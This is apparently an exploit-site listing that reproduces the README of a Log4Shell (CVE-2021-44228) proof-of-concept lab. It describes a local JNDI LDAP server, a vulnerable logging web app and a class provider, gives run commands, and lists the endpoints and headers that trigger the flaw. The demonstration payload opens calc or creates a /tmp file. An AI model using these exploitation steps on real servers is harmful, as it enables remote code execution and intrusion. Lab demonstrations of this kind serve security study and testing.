Exploit for Improper Input Validation in Apache Log4J CVE-2021-44228

Name: Exploit for Improper Input Validation in Apache Log4J CVE-2021-44228
Rating: 5 (201 reviews)
2021-12-15 | CVSS 9.3
## https://sploitus.com/exploit?id=DBBD6963-3870-5117-A829-3DE976AE90E2
# CVE-2021-44228-POC
Yet another CVE-2021-44228 POC

Affected Log4j versions: from 2.0-beta9 up to 2.14.1

## Prerequisites 

Used Java: OpenJDK 11
 - https://jdk.java.net/archive/

Maven required to build apps in this repo (alternatively, download prepared jar files from release):
 - https://maven.apache.org/

## Building & Running the projects 

Directories description: 
 - jndi - project with JNDI LDAP Reference server
 - web - project with vulnerable server
 - provider - project with code compiler & server
 - resources - directory for additional resources (like screenshots)

Build projects with: 
```
mvn clean install
```

Run jars with:
```
java -jar <jar>
```

Files to run (these files will be generated in: <repo_name>/<project_name>/target):
 - jndi-1.0.0-jar-with-dependencies.jar (run with: java -jar jndi-1.0.0-jar-with-dependencies.jar "http://127.0.0.1:8081/#Exploit")
 - web-1.0.0.jar (run with: java -jar web-1.0.0.jar) - runs on port 8080
 - provider-1.0.0.jar (run with: java -jar provider-1.0.0.jar) - runs on port 8081

***Alternatively build and run docker image - Docker section below Screenshots***

## Basic usage

0. Start all projects (as above)
1. Go to http://127.0.0.1:8081/
2. Copy exploit template and paste it in Java Code box
3. Go to vulnerable logger at: http://127.0.0.1:8080/
4. Copy payload from example and send it to the logger
5. Calc app should open (Windows). In case of Linux and Mac, empty file named "PWNED" should be created in \/tmp directory

## Description

Currently, the vulnerability can be exploited via: 
 - */logAction* -> post endpoint (triggers with payload in request headers or "payload" param)
 - */logGetHeaders* -> get endpoint (trigger with request headers)
 - */logPut* -> put endpoint (trigger with request headers or request body)
 - */logDelete* -> delete endpoint (trigger with request headers or request body):

## Screenshots 

Java version:\
![Java version image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/javaVer.png)

Exploit preparation + Compilation + Serving class file:\
![Exploit preparation image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/provider.png)

Payload (to be delivered to log4j) preparation + Sending the payload:\
![Payload image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/web.png)

JNDI Reference:\
![JNDI Reference image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/jndiRef.png)

Exploitation result (Windows):\
![Exploitation result (win) image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/exploitation_win.png)

Exploitation result (GNU/Linux):\
![Exploitation result (lin) image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/exploitation_lin.png)

## Docker

You can also build docker image with Dockerfile located in main repo directory.
Instructions:
```
docker build . -t log4j_vuln
docker run -p 8080:8080 -p 8081:8081 log4j_vuln
```

To find CONTAINER_ID: 
```
docker ps
```

To see exploitation result (inside container):
```
docker exec -it <CONTAINER_ID> bash
ls -la /tmp
```

Kill docker container with: 
```
docker container kill <CONTAINER_ID>
```

## Disclaimer

Code presented in this repository is intended to be used **FOR EDUCATIONAL PURPOSES ONLY**.\
I do not aid, or endorse any malicious usage of data from this repository. 

Additionally, code in this repository is shared on an 'AS IS' BASIS - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND.

## More information

https://www.lunasec.io/docs/blog/log4j-zero-day/